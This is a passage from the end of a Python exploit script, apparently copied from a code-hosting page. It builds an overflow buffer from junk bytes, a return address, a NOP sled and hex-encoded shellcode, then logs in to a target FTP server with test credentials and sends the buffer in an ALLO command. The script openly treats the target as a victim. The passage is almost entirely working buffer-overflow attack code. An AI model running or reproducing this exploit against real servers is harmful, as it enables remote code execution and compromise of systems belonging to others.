"\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
|
||||
"\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")
|
||||
|
||||
|
||||
buff = junk1 + ret + nop + shellcode
|
||||
|
||||
try:
|
||||
print("[-] Connecting to " + ip + " on port " + port + "\n")
|
||||
s.connect((ip,int(port)))
|
||||
data = s.recv(1024)
|
||||
print("[-] Sending exploit...")
|
||||
s.send("USER test\r\n")
|
||||
s.recv(1024)
|
||||
s.send("PASS test\r\n")
|
||||
s.recv(1024)
|
||||
s.send("ALLO "+buff+"\r\n")
|
||||
s.close()
|
||||
print("[-] Exploit successfully sent...")
|
||||
except:
|
||||
print("[-] Connection error...")
|
||||
print("[-] Check if victim is up.")
|
Loading…
Add table
Reference in a new issue